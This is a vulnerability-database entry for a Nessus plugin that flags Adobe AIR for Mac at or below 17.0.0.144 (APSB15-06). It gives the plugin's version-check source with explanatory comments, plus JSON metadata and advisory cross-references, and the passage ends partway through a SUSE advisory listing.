Adobe AIR for Mac <= 17.0.0.144 Multiple Vulnerabilities (APSB15-06)
2015-06-12T00:00:00
ID MACOSX_ADOBE_AIR_APSB15-06.NASL Type nessus Reporter This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof. Modified 2021-01-02T00:00:00
Description
According to its version, the installation of Adobe AIR on the remote
Mac OS X host is equal to or prior to 17.0.0.144. It is, therefore,
affected by multiple vulnerabilities:
- Multiple double-free errors exist that allow an attacker
  to execute arbitrary code. (CVE-2015-0346,
  CVE-2015-0359)
- Multiple memory corruption flaws exist due to improper
  validation of user-supplied input. A remote attacker can
  exploit these flaws, via specially crafted flash
  content, to corrupt memory and execute arbitrary code.
  (CVE-2015-0347, CVE-2015-0350, CVE-2015-0352,
  CVE-2015-0353, CVE-2015-0354, CVE-2015-0355,
  CVE-2015-0360, CVE-2015-3038, CVE-2015-3041,
  CVE-2015-3042, CVE-2015-3043)
- An unspecified buffer overflow condition exists due to
  improper validation of user-supplied input. A remote
  attacker can exploit this to execute arbitrary code.
  (CVE-2015-0348)
- Multiple unspecified use-after-free errors exist that
  allow an attacker to execute arbitrary code.
  (CVE-2015-0349, CVE-2015-0351, CVE-2015-0358,
  CVE-2015-3039)
- An unspecified type confusion flaw exists that allows
  an attacker to execute arbitrary code. (CVE-2015-0356)
- Multiple unspecified memory leaks exist that allow an
  attacker to bypass the Address Space Layout
  Randomization (ASLR) feature. (CVE-2015-0357,
  CVE-2015-3040)
- An unspecified security bypass flaw exists that allows
  an attacker to disclose information. (CVE-2015-3044)
#
# (C) Tenable Network Security, Inc.
#
include("compat.inc");
# Registration block: when the engine sets `description`, only the plugin
# metadata below is registered and the script exits (see exit(0) at the end
# of this block) before any of the version-check logic runs.
if (description)
{
# Plugin identity and revision bookkeeping.
script_id(84160);
script_version("1.9");
script_cvs_date("Date: 2019/11/22");
# Every CVE this single finding stands for. A hit means "installed version
# is at or below the cutoff", not that each CVE was individually verified.
script_cve_id(
"CVE-2015-0346",
"CVE-2015-0347",
"CVE-2015-0348",
"CVE-2015-0349",
"CVE-2015-0350",
"CVE-2015-0351",
"CVE-2015-0352",
"CVE-2015-0353",
"CVE-2015-0354",
"CVE-2015-0355",
"CVE-2015-0356",
"CVE-2015-0357",
"CVE-2015-0358",
"CVE-2015-0359",
"CVE-2015-0360",
"CVE-2015-3038",
"CVE-2015-3039",
"CVE-2015-3040",
"CVE-2015-3041",
"CVE-2015-3042",
"CVE-2015-3043",
"CVE-2015-3044"
);
# Bugtraq IDs cross-referenced by this plugin.
script_bugtraq_id(
74062,
74064,
74065,
74066,
74067,
74068,
74069
);
# Title and one-line summary shown in scan results. The title states the
# inclusive cutoff (<= 17.0.0.144) that the check at the bottom enforces.
script_name(english:"Adobe AIR for Mac <= 17.0.0.144 Multiple Vulnerabilities (APSB15-06)");
script_summary(english:"Checks the version gathered by local check.");
# Report text. The multi-line string literals below are runtime data: their
# line breaks and leading characters are part of the value, so they must not
# be re-indented.
script_set_attribute(attribute:"synopsis", value:
"The remote Mac OS X host has a version of Adobe AIR installed that is
affected by multiple vulnerabilities.");
script_set_attribute(attribute:"description", value:
"According to its version, the installation of Adobe AIR on the remote
Mac OS X host is equal or prior to 17.0.0.144. It is, therefore,
affected by multiple vulnerabilities :
- Multiple double-free errors exist that allow an attacker
to execute arbitrary code. (CVE-2015-0346,
CVE-2015-0359)
- Multiple memory corruption flaws exist due to improper
validation of user-supplied input. A remote attacker can
exploit these flaws, via specially crafted flash
content, to corrupt memory and execute arbitrary code.
(CVE-2015-0347, CVE-2015-0350, CVE-2015-0352,
CVE-2015-0353, CVE-2015-0354, CVE-2015-0355,
CVE-2015-0360, CVE-2015-3038, CVE-2015-3041,
CVE-2015-3042, CVE-2015-3043)
- A unspecified buffer overflow condition exists due to
improper validation of user-supplied input. A remote
attacker can exploit this to execute arbitrary code.
(CVE-2015-0348)
- Multiple unspecified use-after-free errors exist that
allow an attacker to execute arbitrary code.
(CVE-2015-0349, CVE-2015-0351, CVE-2015-0358,
CVE-2015-3039)
- An unspecified type confusion flaw exists that allows
an attacker to execute arbitrary code. (CVE-2015-0356)
- Multiple unspecified memory leaks exist that allows an
attacker to bypass the Address Space Layout
Randomization (ASLR) feature. (CVE-2015-0357,
CVE-2015-3040)
- An unspecified security bypass flaw exists that allows
an attacker to disclose information. (CVE-2015-3044)");
# Vendor advisory. Note it is the Flash Player bulletin (APSB15-06), which
# this plugin cites for Adobe AIR.
script_set_attribute(attribute:"see_also", value:"https://helpx.adobe.com/security/products/flash-player/apsb15-06.html");
# NOTE(review): the URL in the next comment is presumably the target of the
# shortened nessus.org link registered below it -- confirm before relying on it.
# http://helpx.adobe.com/flash-player/kb/archived-flash-player-versions.html
script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?0cb17c10");
# Remediation text; names the same build the check reports as "Fixed version".
script_set_attribute(attribute:"solution", value:
"Upgrade to Adobe AIR 17.0.0.172 or later.");
# CVSS v2 base vector: network-reachable, low complexity, no authentication,
# complete confidentiality/integrity/availability impact.
script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
# CVSS v2 temporal vector: high exploitability (E:H), official fix available
# (RL:OF), report confirmed (RC:C).
script_set_cvss_temporal_vector("CVSS2#E:H/RL:OF/RC:C");
# The score for the whole CVE set is taken from this one CVE.
script_set_attribute(attribute:"cvss_score_source", value:"CVE-2015-3043");
# Exploitability metadata: public exploits, framework coverage and malware use
# are all recorded as true, which is a prioritisation signal for patching.
script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
script_set_attribute(attribute:"exploit_available", value:"true");
script_set_attribute(attribute:"exploit_framework_core", value:"true");
script_set_attribute(attribute:"exploited_by_malware", value:"true");
# NOTE(review): the module name refers to Flash Player, not AIR; whether it
# applies to an AIR installation is not shown here -- confirm.
script_set_attribute(attribute:"metasploit_name", value:'Adobe Flash Player domainMemory ByteArray Use After Free');
script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");
# Timeline: disclosure and patch share a date; the plugin was published later.
script_set_attribute(attribute:"vuln_publication_date", value:"2015/04/14");
script_set_attribute(attribute:"patch_publication_date", value:"2015/04/14");
script_set_attribute(attribute:"plugin_publication_date", value:"2015/06/12");
# "local": the finding is derived from locally gathered install data (the KB
# version string), not from probing the application.
script_set_attribute(attribute:"plugin_type", value:"local");
script_set_attribute(attribute:"cpe", value:"cpe:/a:adobe:air");
script_end_attributes();
# Information-gathering category and the family the plugin is listed under.
script_category(ACT_GATHER_INFO);
script_family(english:"MacOS X Local Security Checks");
script_copyright(english:"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");
# Scheduling prerequisites. The KB keys read by the check are presumably
# written by the dependency named here -- verify against that script.
script_dependencies("macosx_adobe_air_installed.nasl");
# Only the Version key is declared as required; the check also reads
# MacOSX/Adobe_AIR/Path through get_kb_item_or_exit.
script_require_keys("MacOSX/Adobe_AIR/Version");
# Registration ends here; nothing past this block runs in this mode.
exit(0);
}
include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
# Install facts are read from the scan knowledge base. Each lookup goes through
# get_kb_item_or_exit, so the comparison below only runs when both the version
# and the install path were recorded. Nothing here probes the application:
# the verdict rests on the recorded version string alone.
kb_root = "MacOSX/Adobe_AIR";
installed_ver = get_kb_item_or_exit(kb_root + "/Version");
install_path = get_kb_item_or_exit(kb_root + "/Path");

# nb: the comparison is inclusive -- 17.0.0.144 itself is flagged. The build
# reported as fixed (17.0.0.172) is a separate, higher value that is used only
# in the report text, so a version strictly between the two would be audited
# as not vulnerable.
last_affected_ver = '17.0.0.144';
reported_fix_ver = '17.0.0.172';

is_affected = (ver_compare(ver:installed_ver, fix:last_affected_ver, strict:FALSE) <= 0);

if (!is_affected)
  audit(AUDIT_INST_PATH_NOT_VULN, "Adobe AIR", installed_ver, install_path);
else
{
  if (report_verbosity <= 0)
    security_hole(0);
  else
  {
    # Evidence for the analyst: where the install lives, what was found, and
    # the build to upgrade to.
    finding = '\n Path : ' + install_path;
    finding += '\n Installed version : ' + installed_ver;
    finding += '\n Fixed version : ' + reported_fix_ver;
    finding += '\n';
    security_hole(port:0, extra:finding);
  }
  exit(0);
}
{"id": "MACOSX_ADOBE_AIR_APSB15-06.NASL", "bulletinFamily": "scanner", "title": "Adobe AIR for Mac <= 17.0.0.144 Multiple Vulnerabilities (APSB15-06)", "description": "According to its version, the installation of Adobe AIR on the remote\nMac OS X host is equal or prior to 17.0.0.144. It is, therefore,\naffected by multiple vulnerabilities :\n\n - Multiple double-free errors exist that allow an attacker\n to execute arbitrary code. (CVE-2015-0346,\n CVE-2015-0359)\n\n - Multiple memory corruption flaws exist due to improper\n validation of user-supplied input. A remote attacker can\n exploit these flaws, via specially crafted flash\n content, to corrupt memory and execute arbitrary code.\n (CVE-2015-0347, CVE-2015-0350, CVE-2015-0352,\n CVE-2015-0353, CVE-2015-0354, CVE-2015-0355,\n CVE-2015-0360, CVE-2015-3038, CVE-2015-3041,\n CVE-2015-3042, CVE-2015-3043)\n\n - A unspecified buffer overflow condition exists due to\n improper validation of user-supplied input. A remote\n attacker can exploit this to execute arbitrary code.\n (CVE-2015-0348)\n\n - Multiple unspecified use-after-free errors exist that\n allow an attacker to execute arbitrary code.\n (CVE-2015-0349, CVE-2015-0351, CVE-2015-0358,\n CVE-2015-3039)\n\n - An unspecified type confusion flaw exists that allows\n an attacker to execute arbitrary code. (CVE-2015-0356)\n\n - Multiple unspecified memory leaks exist that allows an\n attacker to bypass the Address Space Layout\n Randomization (ASLR) feature. (CVE-2015-0357,\n CVE-2015-3040)\n\n - An unspecified security bypass flaw exists that allows\n an attacker to disclose information. (CVE-2015-3044)", "published": "2015-06-12T00:00:00", "modified": "2021-01-02T00:00:00", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "href": "https://www.tenable.com/plugins/nessus/84160", "reporter": "This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.", "references": ["https://helpx.adobe.com/security/products/flash-player/apsb15-06.html", "http://www.nessus.org/u?0cb17c10"], "cvelist": ["CVE-2015-0355", "CVE-2015-0346", "CVE-2015-0358", "CVE-2015-0351", "CVE-2015-0357", "CVE-2015-0348", "CVE-2015-0353", "CVE-2015-3041", "CVE-2015-0350", "CVE-2015-3040", "CVE-2015-0349", "CVE-2015-0352", "CVE-2015-3044", "CVE-2015-0347", "CVE-2015-0354", "CVE-2015-3039", "CVE-2015-0360", "CVE-2015-3038", "CVE-2015-0359", "CVE-2015-0356", "CVE-2015-3043", "CVE-2015-3042"], "type": "nessus", "lastseen": "2021-01-01T03:26:52", "edition": 26, "viewCount": 2, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:FC7F82AC-EFD4-4E11-A682-CABB2E084D5A"]}, {"type": "nessus", "idList": ["SUSE_11_FLASH-PLAYER-150415.NASL", "REDHAT-RHSA-2015-0813.NASL", "MACOSX_FLASH_PLAYER_APSA15-06.NASL", "OPENSUSE-2015-304.NASL", "FREEBSD_PKG_3364D497E4E611E4A265C485083CA99C.NASL", "GENTOO_GLSA-201504-07.NASL", "ADOBE_AIR_APSB15-06.NASL", "GOOGLE_CHROME_42_0_2311_152.NASL", "SMB_KB3049508.NASL", "FLASH_PLAYER_APSB15-06.NASL"]}, {"type": "suse", "idList": ["SUSE-SU-2015:0878-1", "OPENSUSE-SU-2015:0890-1", "OPENSUSE-SU-2015:0914-1", "SUSE-SU-2015:0722-1", "SUSE-SU-2015:0723-1", "OPENSUSE-SU-2015:0718-1", "OPENSUSE-SU-2015:0725-1"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310805465", "OPENVAS:1361412562310121376", "OPENVAS:1361412562310121374", "OPENVAS:1361412562310851099", "OPENVAS:1361412562310805464", "OPENVAS:1361412562310850878", "OPENVAS:1361412562310805466", "OPENVAS:1361412562310851029"]}, {"type": "kaspersky", "idList": ["KLA10547", "KLA10574", "KLA10576"]}, {"type": "gentoo", "idList": ["GLSA-201504-07", "GLSA-201505-02"]}, {"type": "archlinux", "idList": ["ASA-201504-18"]}, {"type": "freebsd", "idList": ["3364D497-E4E6-11E4-A265-C485083CA99C", "E206DF57-F97B-11E4-B799-C485083CA99C"]}, {"type": "redhat", "idList": ["RHSA-2015:0813"]}, {"type": "cve", "idList": ["CVE-2015-0350", 
"CVE-2015-3039", "CVE-2015-3041", "CVE-2015-3040", "CVE-2015-0346", "CVE-2015-0351", "CVE-2015-3038", "CVE-2015-3043", "CVE-2015-0359", "CVE-2015-3042"]}, {"type": "zdi", "idList": ["ZDI-15-134", "ZDI-15-293", "ZDI-15-133"]}, {"type": "exploitdb", "idList": ["EDB-ID:37839", "EDB-ID:37536", "EDB-ID:36956"]}, {"type": "zdt", "idList": ["1337DAY-ID-24086", "1337DAY-ID-23606", "1337DAY-ID-23847"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:D8E6122E0C3ED28050822787A838C525"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:131825", "PACKETSTORM:132525"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/MULTI/BROWSER/ADOBE_FLASH_NELLYMOSER_BOF/", "MSF:EXPLOIT/MULTI/BROWSER/ADOBE_FLASH_NELLYMOSER_BOF", "MSF:EXPLOIT/WINDOWS/BROWSER/ADOBE_FLASH_DOMAIN_MEMORY_UAF"]}, {"type": "hackerone", "idList": ["H1:63324", "H1:73276", "H1:56385"]}, {"type": "thn", "idList": ["THN:B74D1710436E41A0246F2D91A101DF62"]}, {"type": "threatpost", "idList": ["THREATPOST:F5AE68DD67373F4022C1BBC1B5C2DDB3", "THREATPOST:0FAFED5DB78FA64CCE60EB40BB4C8915"]}, {"type": "googleprojectzero", "idList": ["GOOGLEPROJECTZERO:58B8640C3716E8B2D608FF8EDD780806"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:14490"]}], "modified": "2021-01-01T03:26:52", "rev": 2}, "score": {"value": 10.2, "vector": "NONE", "modified": "2021-01-01T03:26:52", "rev": 2}, "vulnersScore": 10.2}, "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(84160);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2019/11/22\");\n\n script_cve_id(\n \"CVE-2015-0346\",\n \"CVE-2015-0347\",\n \"CVE-2015-0348\",\n \"CVE-2015-0349\",\n \"CVE-2015-0350\",\n \"CVE-2015-0351\",\n \"CVE-2015-0352\",\n \"CVE-2015-0353\",\n \"CVE-2015-0354\",\n \"CVE-2015-0355\",\n \"CVE-2015-0356\",\n \"CVE-2015-0357\",\n \"CVE-2015-0358\",\n \"CVE-2015-0359\",\n \"CVE-2015-0360\",\n \"CVE-2015-3038\",\n \"CVE-2015-3039\",\n \"CVE-2015-3040\",\n \"CVE-2015-3041\",\n 
\"CVE-2015-3042\",\n \"CVE-2015-3043\",\n \"CVE-2015-3044\"\n );\n script_bugtraq_id(\n 74062,\n 74064,\n 74065,\n 74066,\n 74067,\n 74068,\n 74069\n );\n\n script_name(english:\"Adobe AIR for Mac <= 17.0.0.144 Multiple Vulnerabilities (APSB15-06)\");\n script_summary(english:\"Checks the version gathered by local check.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Mac OS X host has a version of Adobe AIR installed that is\naffected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its version, the installation of Adobe AIR on the remote\nMac OS X host is equal or prior to 17.0.0.144. It is, therefore,\naffected by multiple vulnerabilities :\n\n - Multiple double-free errors exist that allow an attacker\n to execute arbitrary code. (CVE-2015-0346,\n CVE-2015-0359)\n\n - Multiple memory corruption flaws exist due to improper\n validation of user-supplied input. A remote attacker can\n exploit these flaws, via specially crafted flash\n content, to corrupt memory and execute arbitrary code.\n (CVE-2015-0347, CVE-2015-0350, CVE-2015-0352,\n CVE-2015-0353, CVE-2015-0354, CVE-2015-0355,\n CVE-2015-0360, CVE-2015-3038, CVE-2015-3041,\n CVE-2015-3042, CVE-2015-3043)\n\n - A unspecified buffer overflow condition exists due to\n improper validation of user-supplied input. A remote\n attacker can exploit this to execute arbitrary code.\n (CVE-2015-0348)\n\n - Multiple unspecified use-after-free errors exist that\n allow an attacker to execute arbitrary code.\n (CVE-2015-0349, CVE-2015-0351, CVE-2015-0358,\n CVE-2015-3039)\n\n - An unspecified type confusion flaw exists that allows\n an attacker to execute arbitrary code. (CVE-2015-0356)\n\n - Multiple unspecified memory leaks exist that allows an\n attacker to bypass the Address Space Layout\n Randomization (ASLR) feature. 
(CVE-2015-0357,\n CVE-2015-3040)\n\n - An unspecified security bypass flaw exists that allows\n an attacker to disclose information. (CVE-2015-3044)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb15-06.html\");\n # http://helpx.adobe.com/flash-player/kb/archived-flash-player-versions.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0cb17c10\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Adobe AIR 17.0.0.172 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-3043\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player domainMemory ByteArray Use After Free');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/04/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/04/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/06/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:air\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_adobe_air_installed.nasl\");\n script_require_keys(\"MacOSX/Adobe_AIR/Version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nkb_base = \"MacOSX/Adobe_AIR\";\nversion = get_kb_item_or_exit(kb_base+\"/Version\");\npath = get_kb_item_or_exit(kb_base+\"/Path\");\n\n# nb: we're checking for versions less than *or equal to* the cutoff!\ncutoff_version = '17.0.0.144';\nfixed_version_for_report = '17.0.0.172';\n\nif (ver_compare(ver:version, fix:cutoff_version, strict:FALSE) <= 0)\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n Path : ' + path +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fixed_version_for_report +\n '\\n';\n security_hole(port:0, extra:report);\n }\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_INST_PATH_NOT_VULN, \"Adobe AIR\", version, path);\n", "naslFamily": "MacOS X Local Security Checks", "pluginID": "84160", "cpe": ["cpe:/a:adobe:air"], "scheme": null}
{"attackerkb": [{"lastseen": "2020-11-23T18:08:39", "bulletinFamily": "info", "cvelist": ["CVE-2015-0347", "CVE-2015-0350", "CVE-2015-0352", "CVE-2015-0353", "CVE-2015-0354", "CVE-2015-0355", "CVE-2015-0360", "CVE-2015-3038", "CVE-2015-3041", "CVE-2015-3042", "CVE-2015-3043"], "description": "Adobe Flash Player before 13.0.0.281 and 14.x through 17.x before 17.0.0.169 on Windows and OS X and before 11.2.202.457 on Linux allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, as exploited in the wild in April 2015, a different vulnerability than CVE-2015-0347, CVE-2015-0350, CVE-2015-0352, CVE-2015-0353, CVE-2015-0354, CVE-2015-0355, CVE-2015-0360, CVE-2015-3038, CVE-2015-3041, and CVE-2015-3042.\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at November 23, 2020 6:03pm UTC reported:\n\nReported as exploited in the wild as part of Google\u2019s 2020 0day vulnerability spreadsheet they made available at <https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit#gid=1869060786>. 
Original tweet announcing this spreadsheet with the 2020 findings can be found at <https://twitter.com/maddiestone/status/1329837665378725888>\n", "modified": "2020-07-30T00:00:00", "published": "2015-04-14T00:00:00", "id": "AKB:FC7F82AC-EFD4-4E11-A682-CABB2E084D5A", "href": "https://attackerkb.com/topics/mFVIlXM7D2/cve-2015-3043", "type": "attackerkb", "title": "CVE-2015-3043", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "suse": [{"lastseen": "2016-09-04T11:40:22", "bulletinFamily": "unix", "cvelist": ["CVE-2015-0355", "CVE-2015-0346", "CVE-2015-0358", "CVE-2015-0351", "CVE-2015-0357", "CVE-2015-0348", "CVE-2015-0353", "CVE-2015-3041", "CVE-2015-0350", "CVE-2015-3040", "CVE-2015-0349", "CVE-2015-0352", "CVE-2015-3044", "CVE-2015-0347", "CVE-2015-0354", "CVE-2015-3039", "CVE-2015-0360", "CVE-2015-3038", "CVE-2015-0359", "CVE-2015-0356", "CVE-2015-3043", "CVE-2015-3042"], "description": "Adobe Flash Player was updated to 11.2.202.457 to fix several security\n issues that could lead to remote code execution.\n\n An exploit for CVE-2015-3043 was reported to exist in the wild.\n\n The following vulnerabilities were fixed:\n\n * Memory corruption vulnerabilities that could lead to code execution\n (CVE-2015-0347, CVE-2015-0350, CVE-2015-0352, CVE-2015-0353,\n CVE-2015-0354, CVE-2015-0355, CVE-2015-0360, CVE-2015-3038,\n CVE-2015-3041, CVE-2015-3042, CVE-2015-3043).\n * Type confusion vulnerability that could lead to code execution\n (CVE-2015-0356).\n * Buffer overflow vulnerability that could lead to code execution\n (CVE-2015-0348).\n * Use-after-free vulnerabilities that could lead to code execution\n (CVE-2015-0349, CVE-2015-0351, CVE-2015-0358, CVE-2015-3039).\n * Double-free vulnerabilities that could lead to code execution\n (CVE-2015-0346, CVE-2015-0359).\n * Memory leak vulnerabilities that could be used to bypass ASLR\n (CVE-2015-0357, CVE-2015-3040).\n * Security bypass vulnerability that could lead to information disclosure\n 
(CVE-2015-3044).\n\n", "edition": 1, "modified": "2015-04-15T13:05:12", "published": "2015-04-15T13:05:12", "id": "SUSE-SU-2015:0722-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2015-04/msg00011.html", "type": "suse", "title": "Security update for Adobe Flash Player (important)", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:56:25", "bulletinFamily": "unix", "cvelist": ["CVE-2015-0355", "CVE-2015-0346", "CVE-2015-0358", "CVE-2015-0351", "CVE-2015-0357", "CVE-2015-0348", "CVE-2015-0353", "CVE-2015-3041", "CVE-2015-0350", "CVE-2015-3040", "CVE-2015-0349", "CVE-2015-0352", "CVE-2015-3044", "CVE-2015-0347", "CVE-2015-0354", "CVE-2015-3039", "CVE-2015-0360", "CVE-2015-3038", "CVE-2015-0359", "CVE-2015-0356", "CVE-2015-3043", "CVE-2015-3042"], "description": "Adobe Flash Player was updated to 11.2.202.457 to fix several security\n issues that could lead to remote code execution.\n\n An exploit for CVE-2015-3043 was reported to exist in the wild.\n\n The following vulnerabilities were fixed:\n\n * Memory corruption vulnerabilities that could lead to code execution\n (CVE-2015-0347, CVE-2015-0350, CVE-2015-0352, CVE-2015-0353,\n CVE-2015-0354, CVE-2015-0355, CVE-2015-0360, CVE-2015-3038,\n CVE-2015-3041, CVE-2015-3042, CVE-2015-3043).\n * Type confusion vulnerability that could lead to code execution\n (CVE-2015-0356).\n * Buffer overflow vulnerability that could lead to code execution\n (CVE-2015-0348).\n * Use-after-free vulnerabilities that could lead to code execution\n (CVE-2015-0349, CVE-2015-0351, CVE-2015-0358, CVE-2015-3039).\n * Double-free vulnerabilities that could lead to code execution\n (CVE-2015-0346, CVE-2015-0359).\n * Memory leak vulnerabilities that could be used to bypass ASLR\n (CVE-2015-0357, CVE-2015-3040).\n * Security bypass vulnerability that could lead to information disclosure\n (CVE-2015-3044).\n\n", "edition": 1, "modified": 
"2015-04-15T10:04:46", "published": "2015-04-15T10:04:46", "id": "OPENSUSE-SU-2015:0718-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2015-04/msg00010.html", "title": "Security update for Adobe Flash Player (important)", "type": "suse", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:50:17", "bulletinFamily": "unix", "cvelist": ["CVE-2015-0355", "CVE-2015-0346", "CVE-2015-0358", "CVE-2015-0351", "CVE-2015-0357", "CVE-2015-0348", "CVE-2015-0353", "CVE-2015-3041", "CVE-2015-0350", "CVE-2015-3040", "CVE-2015-0349", "CVE-2015-0352", "CVE-2015-3044", "CVE-2015-0347", "CVE-2015-0354", "CVE-2015-3039", "CVE-2015-0360", "CVE-2015-3038", "CVE-2015-0359", "CVE-2015-0356", "CVE-2015-3043", "CVE-2015-3042"], "description": "Adobe Flash Player was updated to version 11.2.202.457 to fix several\n security issues that could have lead to remote code execution.\n\n An exploit for CVE-2015-3043 was reported to exist in the wild.\n\n The following vulnerabilities have been fixed:\n\n * Memory corruption vulnerabilities that could have lead to code\n execution (CVE-2015-0347, CVE-2015-0350, CVE-2015-0352,\n CVE-2015-0353, CVE-2015-0354, CVE-2015-0355, CVE-2015-0360,\n CVE-2015-3038, CVE-2015-3041, CVE-2015-3042, CVE-2015-3043).\n * Type confusion vulnerability that could have lead to code execution\n (CVE-2015-0356).\n * Buffer overflow vulnerability that could have lead to code execution\n (CVE-2015-0348).\n * Use-after-free vulnerabilities that could have lead to code\n execution (CVE-2015-0349, CVE-2015-0351, CVE-2015-0358,\n CVE-2015-3039).\n * Double-free vulnerabilities that could have lead to code execution\n (CVE-2015-0346, CVE-2015-0359).\n * Memory leak vulnerabilities that could have been used to bypass ASLR\n (CVE-2015-0357, CVE-2015-3040).\n * Security bypass vulnerability that could have lead to information\n disclosure (CVE-2015-3044).\n\n Security Issues:\n\n * 
CVE-2015-0346\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0346\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0346</a>>\n * CVE-2015-0347\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0347\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0347</a>>\n * CVE-2015-0348\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0348\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0348</a>>\n * CVE-2015-0349\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0349\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0349</a>>\n * CVE-2015-0350\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0350\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0350</a>>\n * CVE-2015-0351\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0351\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0351</a>>\n * CVE-2015-0352\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0352\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0352</a>>\n * CVE-2015-0353\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0353\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0353</a>>\n * CVE-2015-0354\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0354\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0354</a>>\n * CVE-2015-0355\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0355\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0355</a>>\n * CVE-2015-0356\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0356\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0356</a>>\n * CVE-2015-0357\n <<a rel=\"nofollow\" 
